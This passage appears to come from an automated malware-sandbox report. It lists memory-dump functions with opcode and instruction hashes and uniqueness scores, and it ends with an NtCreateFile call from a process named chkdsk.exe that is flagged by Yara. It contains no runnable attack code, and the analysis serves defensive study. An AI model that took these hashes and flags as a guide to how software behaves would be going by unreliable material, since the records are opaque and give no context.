Opcode ID: b8664460602b41b650b18e365a2f28dd9df04314c45d8c651ca7938e0d2df05d
Instruction ID: 7d24ec7d90017ace1acdf46de700c84a5a7f34bec06ceb796035090df2007c05
Opcode Fuzzy Hash: b8664460602b41b650b18e365a2f28dd9df04314c45d8c651ca7938e0d2df05d
Instruction Fuzzy Hash: 03E09272A01422ABE3219A58AC40F66739DDBE4B55F0A4035E604E7214D628DE01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0186F358, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: f0ea709da3954f9f79b6f472d07cd64f8dfa3e2064dd07e47cc322f6fafaba48
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: FBE0DF32A40228FBDB21AADDAE05FAABFACDB58B60F040195BB04DB550D564DF00D2D1

Uniqueness

Uniqueness Score: -1.00%

Function 0187FF60, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643063bc4eafd227545a570dba8985869ce9a56ecb7c8fb01e2e30441dab1579
Instruction ID: e966a6047e7f0052b52151c679bec2298d5e71e26c3a17868954d3a5f9e1bb2e
Opcode Fuzzy Hash: 643063bc4eafd227545a570dba8985869ce9a56ecb7c8fb01e2e30441dab1579
Instruction Fuzzy Hash: D9E0DFB0209208DFD735EB5BE040F253B9C9BA2721F19801DF218CB502CE21EA81C286

Uniqueness

Uniqueness Score: -1.00%

Function 018F41E8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caee5bd09e10f9ddcc3fc7a35f399c294d0172fe4cbea3dcf2f271ebfe32c164
Instruction ID: 08e3e59fd643fd1148986b77fb256dce956a0e6ef2323b5380209cf32b9a8f93
Opcode Fuzzy Hash: caee5bd09e10f9ddcc3fc7a35f399c294d0172fe4cbea3dcf2f271ebfe32c164
Instruction Fuzzy Hash: FCF01E78824701DFDBB0EFBA950075837E4F794324F00826A9208E7A99C73446A1CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0191D380, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 0d26d2ffb1d6349210c971ce84506fc1e98317495f6070c40fbadd13ba337235
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: F5E0C23128020DBBDB226E88CC00F697B6ADF507A5F204031FE089A690C6759D92D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0189A185, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91bddf10520fe9ca36aad8232f2848543faebc6bc2c714093dfa216b0d31ebc2
Instruction ID: eb914ae9b7b2c84bd7590f1ea5466be6e806d0c116a29145444bfe07762f79cf
Opcode Fuzzy Hash: 91bddf10520fe9ca36aad8232f2848543faebc6bc2c714093dfa216b0d31ebc2
Instruction Fuzzy Hash: C0D02BB112060056CB2DB3149814B213662F7C0760F78040CF20BDB5A4F9508DD4E309

Uniqueness

Uniqueness Score: -1.00%

Function 018916E0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f9583a598f6e30095f86b1dfd5bf093ad202b6e291e1a12aac09af5749e734
Instruction ID: e45bd099b42621a891763c634e1fee9756843971c5112605cab91ccba4474f28
Opcode Fuzzy Hash: 56f9583a598f6e30095f86b1dfd5bf093ad202b6e291e1a12aac09af5749e734
Instruction Fuzzy Hash: 8AD0A731214203A2EF2E9B189808B143651EB907A5F3C005CF20BD95C0DFA0CE92E088

Uniqueness

Uniqueness Score: -1.00%

Function 018E53CA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 51bfcd3ca45b85b5973b4ce6fad2540aff5074a2be78dbb21ffc3e286ae1bfdf
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: DAE08C359047849BCF12EB4CCA94F5EBBF5FB46B00F180044A008AB620C624EE00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0187AAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a71656dcba3cfdda0c11451cc9eaa9f23e7524ed393bac9c7b34402430efc8c9
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 01D0E939352980CFD61BDB1DC594B1577A4BB44B44FC50494E501CB762E63CDA44CA00

Uniqueness

Uniqueness Score: -1.00%

Function 018935A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: b459bea2cf4d476219c6cd755c1ee61c8cd5a467063be567acdacb673d6bf4a1
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 10D0A731401185B9DF01AF38C1147683B71BB44308F5C1055A801C5452C3354B09C601

Uniqueness

Uniqueness Score: -1.00%

Function 0186DB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 261f311bdc426b9fb7f1c9344cd4bfd926a29601b6a7e3672b7e9fced643cc83
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: D6C08C31380A02AAFB226F24CD01B003AA4BB50B05F4400A06300DA0F0EB78DA01E600

Uniqueness

Uniqueness Score: -1.00%

Function 018EA537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 446234599ff33a3d4e231b3d71c452f239bbaff3da7513ed172de107cc855068
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 82C08C37080248BBCB127F85CC00F067F2AFBA4B60F008010FA084B5B0C632EA70EB84

Uniqueness

Uniqueness Score: -1.00%

Function 01883A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 5c0b2a1202e7d8d98d6b8698d09c4d5c8b2658e7f45ffdaa6f37cc981731f433
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 4BC08C33080248BBC712AE45DC00F017B29E7A0B60F000020B6040A5608632ED60D588

Uniqueness

Uniqueness Score: -1.00%

Function 0186AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 8679199f2e3f2e1981dc9bd1effc0ba7afcba82d61ff4a19c4423a9a85bebd8b
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 50C08C32080248BBC7127A49CD00F017B29EBA0B60F100020B6044A6618932E960D588

Uniqueness

Uniqueness Score: -1.00%

Function 018936CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 685f1589987143a86f506287388d7aa99367a055404dc3b8bd1ce0d43830381b
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 58C02B71150440FBEF266F34CD00F147254F700B21F6803547220C54F0E6289D00E100

Uniqueness

Uniqueness Score: -1.00%

Function 018776E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 550b104d648f57671a5b642b5ed56ee5765dbfebe0e58bc322edbb5607463549
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 6EC08C701411845AEB2A770CCE28B203A60AF08708F58019CAB01894A2C368EA23C208

Uniqueness

Uniqueness Score: -1.00%

Function 01887D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 1f12a9d4b42f9001355b4ffb75117b9a878de514c4bea083d13ed1576ccafa88
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 34B092353029808FCE16EF18C080B1533F4BB44B40B9400D0E400CBA21D229E9008900

Uniqueness

Uniqueness Score: -1.00%

Function 01892ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 797cd59f33c6ab623a03bb1768bb722a7310da59ae5b74ecde8d4a524dc5e887
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 03B01232C10441CFCF02EF44CA50B297731FB00750F0944D1900177930C228ED01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 018A99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53722d7b4a48509dfbb899b45a0c8c49ea1b55b9ddaf3a6085cd23db2c7db6a
Instruction ID: dffa49b9d7636cb1ba132b744eef22e789566e3bbd3d4a1030e5f3d7db868264
Opcode Fuzzy Hash: f53722d7b4a48509dfbb899b45a0c8c49ea1b55b9ddaf3a6085cd23db2c7db6a
Instruction Fuzzy Hash: CE9002A121100053D144619944547460045E7E1345F51C122A3248674CC5699D656165

Uniqueness

Uniqueness Score: -1.00%

Function 018A9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1be75e5dc456e6658d41af0d7569c22b9319767c7788793e20d74e84b5faa7
Instruction ID: 689198547a910082878e58cf9081c05cbe325f6f4ed0c89f6bdc92542879ddc7
Opcode Fuzzy Hash: 9d1be75e5dc456e6658d41af0d7569c22b9319767c7788793e20d74e84b5faa7
Instruction Fuzzy Hash: 669002A120140413D180659948546470005E7D0346F51C121A3158675ECA699D557175

Uniqueness

Uniqueness Score: -1.00%

Function 018A98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b557384ce8c797fdf6ca82d363269af6434b821a68287610396a3b460b5cca
Instruction ID: 2305f73e60894125e98cca71dbde7d3e66c805ef02808a003e3773a5a8fdb7ce
Opcode Fuzzy Hash: a5b557384ce8c797fdf6ca82d363269af6434b821a68287610396a3b460b5cca
Instruction Fuzzy Hash: AF90026130100413D142619944646460009E7D1389F91C122E2518675DC6659A57B172

Uniqueness

Uniqueness Score: -1.00%

Function 018A9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0878deeb8abf307d1c4f849977cc3e2ff5ca22055a86281b47377c2fd67bdd
Instruction ID: d34b879d7821a983f2f2c5114a90c0e991a06dd03389d63eb18a48f6ccdac25b
Opcode Fuzzy Hash: 6a0878deeb8abf307d1c4f849977cc3e2ff5ca22055a86281b47377c2fd67bdd
Instruction Fuzzy Hash: 8390027124100413D181719944546460009F7D0385F91C122A1518674EC6959B5ABAA1

Uniqueness

Uniqueness Score: -1.00%

Function 018AB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a008325b454df7b61ee21121d145ff8b2e6e4b83c7068e63cee39816b3c7920
Instruction ID: 3c7880168d590e763317591bb39ff45ba1fcc34d33571771676cd1740ab48e66
Opcode Fuzzy Hash: 4a008325b454df7b61ee21121d145ff8b2e6e4b83c7068e63cee39816b3c7920
Instruction Fuzzy Hash: F89002A1601140534580B19948544465015F7E1345391C231A1548670CC6A89959A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 018AA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750071cfca3dbd5e2220c06b759477eb79589adaa8a7fe61cb7a28125c24c3e0
Instruction ID: e55d57cf6a126e9df53e976fb57caf20ac77f9b21a2c30f564e0988aef4455da
Opcode Fuzzy Hash: 750071cfca3dbd5e2220c06b759477eb79589adaa8a7fe61cb7a28125c24c3e0
Instruction Fuzzy Hash: EC90027120144013D1807199849464B5005F7E0345F51C521E1519674CC655995AA261

Uniqueness

Uniqueness Score: -1.00%

Function 018A9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eaf6defd6c21993f30de5e884dd5f6a7c5210f2e293e28ad1e081dd3490efab
Instruction ID: fd32d05b59c35c40d04b9f6bbc2750c9195285896f2d002ff03d6c69bc0de20e
Opcode Fuzzy Hash: 4eaf6defd6c21993f30de5e884dd5f6a7c5210f2e293e28ad1e081dd3490efab
Instruction Fuzzy Hash: FF90026124100813D180719984647470006E7D0745F51C121A1118674DC6569A6976F1

Uniqueness

Uniqueness Score: -1.00%

Function 018A9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7cac627e1e1a148c192fc41a1d57b27c69519ad37455efbf84dc200a136116
Instruction ID: 7fae08143f93e77423d36bbb9b5d82df5a41481bbc84973b44ba97bd56db8ea3
Opcode Fuzzy Hash: 6c7cac627e1e1a148c192fc41a1d57b27c69519ad37455efbf84dc200a136116
Instruction Fuzzy Hash: 3190026120144453D18062994854B4F4105E7E1346F91C129A524A674CC95599596761

Uniqueness

Uniqueness Score: -1.00%

Function 018A9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d273ec761a8b327587204cffbd1499c5948bc1eb9fb50a7828a0c01ee79a05
Instruction ID: 036d291db51742af1ed32ff5b0ab64b01c4bf1acf24e822bfaef0fb9e0aa5791
Opcode Fuzzy Hash: c1d273ec761a8b327587204cffbd1499c5948bc1eb9fb50a7828a0c01ee79a05
Instruction Fuzzy Hash: 0190027120140413D140619948587870005E7D0346F51C121A6258675EC6A5D9957571

Uniqueness

Uniqueness Score: -1.00%

Function 018A95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e0930f49d199b95ca7e907fc0aa44739cdf7035fb414306671dbbf1140dabd
Instruction ID: f43824dc9fbf401052bfec504ebd0c467e0b872189b33009a38c5fa331863745
Opcode Fuzzy Hash: 00e0930f49d199b95ca7e907fc0aa44739cdf7035fb414306671dbbf1140dabd
Instruction Fuzzy Hash: 7790027120100813D144619948546C60005E7D0345F51C121A7118775ED6A599957171

Uniqueness

Uniqueness Score: -1.00%

Function 018A9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e940eece4d8cbbd0b4e714e79f8ea607d511e0fb3fafdc17ab5b2b6c783687f1
Instruction ID: ba421a06fea494ec333a0bc63868bae4d6ada5436855ad1c3244aa92ce5934ca
Opcode Fuzzy Hash: e940eece4d8cbbd0b4e714e79f8ea607d511e0fb3fafdc17ab5b2b6c783687f1
Instruction Fuzzy Hash: 499002E1201140A34540A2998454B4A4505E7E0345B51C126E2148670CC5659955A175

Uniqueness

Uniqueness Score: -1.00%

Function 018AAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ca9bb9f40194f33ac7339956e4c1fbac29a5e05c1a98d1750d076da8a44094
Instruction ID: 3dc93bef069b8afb58c836f2cc8dcfe9675547df84a46d2a512b2938b28bf2ce
Opcode Fuzzy Hash: 58ca9bb9f40194f33ac7339956e4c1fbac29a5e05c1a98d1750d076da8a44094
Instruction Fuzzy Hash: B1900271A05000239180719948646864006F7E0785B55C121A1608674CC9949B5963E1

Uniqueness

Uniqueness Score: -1.00%

Function 018A9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33cb1a7bea825f03c30fa0ffda5107d63600c02298a0b68a6170837877799f1
Instruction ID: 1206567ea2d8c1da80c20c69177532061f465ad2a9737d651630db117971b8b8
Opcode Fuzzy Hash: f33cb1a7bea825f03c30fa0ffda5107d63600c02298a0b68a6170837877799f1
Instruction Fuzzy Hash: EB900265221000130185A599065454B0445F7D6395391C125F250A6B0CC66199696361

Uniqueness

Uniqueness Score: -1.00%

Function 018A9FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4164023442c90a35cb1428a05d31b4990d135a159fb8c789b43823fe8af77053
Instruction ID: 3b6c1bb72d6d8709df20c338acc5fcba12f466f5661e46ed504337d62b20c27a
Opcode Fuzzy Hash: 4164023442c90a35cb1428a05d31b4990d135a159fb8c789b43823fe8af77053
Instruction Fuzzy Hash: FF90027131114413D150619984547460005E7D1345F51C521A1918678DC6D599957162

Uniqueness

Uniqueness Score: -1.00%

Function 018AA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfba020f29ca244552cbab3f29e110dda458b32d91b2329efdea16e92e39a362
Instruction ID: 92a6907ef679aabf82d5b4364c2f64135ae406f5aacd847751f225b3590dbdd7
Opcode Fuzzy Hash: bfba020f29ca244552cbab3f29e110dda458b32d91b2329efdea16e92e39a362
Instruction Fuzzy Hash: 50900271301000639540A6D95854A8A4105E7F0345B51D125A5108674CC59499656161

Uniqueness

Uniqueness Score: -1.00%

Function 018A9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34689c50679c0800580f5b8f89fe93d321289b53835f2866a8a0788f3676038
Instruction ID: 1181145316183587c5d9282c33bbdb605290397df34962c66d0ab50f96322902
Opcode Fuzzy Hash: f34689c50679c0800580f5b8f89fe93d321289b53835f2866a8a0788f3676038
Instruction Fuzzy Hash: F790026160500413D180719954687460015E7D0345F51D121A1118674DC6999B5976E1

Uniqueness

Uniqueness Score: -1.00%

Function 018A9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7079d1e53e5aa3a6ecb439369d39ffea7d4b7a54a2c760f7e6cbc06ed23d63df
Instruction ID: f08cb9cf34f3dca49b36b545627860e6cb979b4382b4aa7e4f527138b33739f4
Opcode Fuzzy Hash: 7079d1e53e5aa3a6ecb439369d39ffea7d4b7a54a2c760f7e6cbc06ed23d63df
Instruction Fuzzy Hash: 6790027120100413D140619955587470005E7D0345F51D521A1518678DD69699557161

Uniqueness

Uniqueness Score: -1.00%

Function 018AA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432ef4c97a31aeaedd8f1eb2e443b5fa5871e0dfe30c8fb89aac189f512f33fe
Instruction ID: a857d40eeb9624bb790e5465f7341ecfcf83b6f59db722861ed6d34642f59863
Opcode Fuzzy Hash: 432ef4c97a31aeaedd8f1eb2e443b5fa5871e0dfe30c8fb89aac189f512f33fe
Instruction Fuzzy Hash: 0B90027520504453D54065995854AC70005E7D0349F51D521A15186BCDC6949965B161

Uniqueness

Uniqueness Score: -1.00%

Function 018A9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b110be3d69d3c5ab7dcbeb8f1d81498733232f2bfcf9f7c8be3040649c2bb6d6
Instruction ID: df774ccf58a61147d86c21aec467cec6538456e7631bb801a64c6d1d8cd457a7
Opcode Fuzzy Hash: b110be3d69d3c5ab7dcbeb8f1d81498733232f2bfcf9f7c8be3040649c2bb6d6
Instruction Fuzzy Hash: 6A90026120504453D14065995458A460005E7D0349F51D121A21586B5DC6759955B171

Uniqueness

Uniqueness Score: -1.00%

Function 018A96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09cd244e87e1564cec8b31ca8677d9bccca9c9601442b29b91c62f338d2fb759
Instruction ID: fa294a71b5fadb157bcf6d435f9f3c7f75f39901321c2dd465270440a2fab05c
Opcode Fuzzy Hash: 09cd244e87e1564cec8b31ca8677d9bccca9c9601442b29b91c62f338d2fb759
Instruction Fuzzy Hash: E690027120100853D14061994454B860005E7E0345F51C126A1218774DC655D9557561

Uniqueness

Uniqueness Score: -1.00%

Function 018A9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a928889a5ac181a99e4bc2b6d43e59cb0b38ca2afa798896ee10bd3394e018
Instruction ID: ae8e6288eb31b651a459c6325385801daa0776e1311a2725ed3d9840d8144bd0
Opcode Fuzzy Hash: 67a928889a5ac181a99e4bc2b6d43e59cb0b38ca2afa798896ee10bd3394e018
Instruction Fuzzy Hash: 8290027160500813D190719944647860005E7D0345F51C121A1118774DC7959B5976E1

Uniqueness

Uniqueness Score: -1.00%

Function 018A9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d90d1ac214318c7fad468a8094cdac92962da56c2d8bd58fd84f66347d601a2
Instruction ID: a71990779f3becf56faa2b65f58759ec66a1684423345df33382345bbc8e0d14
Opcode Fuzzy Hash: 2d90d1ac214318c7fad468a8094cdac92962da56c2d8bd58fd84f66347d601a2
Instruction Fuzzy Hash: AC90027120504853D18071994454A860015E7D0349F51C121A11587B4DD6659E59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 018A9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 8186937a29bdc5047a66780246883f3527527ca2e7f64cdf9c23d7d2462aa5d7
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chkdsk.exe PID: 5072 Parent PID: 3424 chkdsk.exeCOMMON

Executed Functions

Function 04339D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,04334B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04334B87,007A002E,00000000,00000060,00000000,00000000), ref: 04339DAD

Strings

.z`, xrefs: 04339D9D, 04339DA8

Memory Dump Source

Source File: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, Offset: 04320000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 0745dc83a1d11648f36a3472d836cb87ff03329444cd8d0f13c8964306659724
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
